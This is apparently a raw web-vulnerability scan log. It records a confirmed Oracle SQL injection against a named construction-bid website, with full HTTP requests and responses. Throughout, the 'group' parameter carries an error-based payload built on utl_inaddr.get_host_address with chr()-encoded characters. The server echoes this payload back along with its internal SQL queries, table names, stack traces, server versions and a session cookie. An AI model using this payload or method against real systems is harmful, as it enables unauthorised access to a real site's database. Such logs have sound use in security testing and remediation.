jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:38 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:38 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11096
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:00.765 [ 1] (TP-Processor1866) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:00 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:00 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8585
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:21.152 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) ORDER BY j.bid_date asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:00 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:00 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8585
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:21.152 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) 